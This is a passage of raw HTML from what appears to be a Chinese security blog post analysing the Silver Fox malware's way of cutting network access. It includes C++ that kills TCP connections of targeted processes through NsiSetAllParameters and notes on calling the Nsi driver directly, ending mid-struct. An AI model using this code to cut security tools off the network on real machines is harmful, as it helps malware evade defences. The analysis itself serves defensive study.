11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">true</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">auto</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> procName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">procName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">这样我们进阶实现了略底层的小玩具，试一下效果</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:321.20001220703125px;" class="rich_pages wxw-img" data-ratio="0.5735607675906184" data-w="1876" src="https://wechat2rss.xlab.app/img-proxy/?k=b3932b4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXIvQRia8JibxrvArRKnicY8iaQiaIiaGKGLchDBGU4KVic4H65ib7JWg29nMlmQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">依旧可以保持阻断网络。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">前面我们调用的是 nsi.dll 中导出的 NsiSetAllParameters。但其实这个函数的本质就是：</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">构造一个结构体 → 调用 NtDeviceIoControlFile → 与 \.\Nsi 驱动通信 → 让内核修改 TCP 状态</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们现在要做的就是：            </span><span leaf=""><br/></span><span leaf="">跳过 nsi.dll，完全不依赖其封装，自己来实现这套流程。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:388.8999938964844px;" class="rich_pages wxw-img" data-ratio="0.6944613511868534" data-w="1643" src="https://wechat2rss.xlab.app/img-proxy/?k=224e6eda&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXnNb7fiacHhU9JZqvPtAO8XAEP5XnibVZHFbF560CqHldvngLl7I28vsw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:280.54998779296875px;" class="rich_pages wxw-img" data-ratio="0.5009721322099806" data-w="1543" src="https://wechat2rss.xlab.app/img-proxy/?k=6c686be9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXY5lH6eV2jO5XLfwFXltkYp0KAFmKfX0BJzovEDBWTaFF4IUwrwQDog%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">这里应该字面意思也可以看明白，我们最终其实是和驱动通讯来完成的TCP连接关闭。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:375.04998779296875px;" class="rich_pages wxw-img" data-ratio="0.6697191697191697" data-w="1638" src="https://wechat2rss.xlab.app/img-proxy/?k=b25a8f90&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXqm6Q24VYEwsibfoppPkfl7fxmZe4vtOby5tUZPLiauHo9yYlLiaaCAGRg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span style="mso-spacerun:yes;"><span leaf=""> </span></span><span leaf="">NsiSetAllParameters 实际上传的是一个 0x48 字节的结构体，组成如下（我瞎写的）：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">struct</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NSI_SET_PARAMETERS_EX </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID reserved0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x00</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 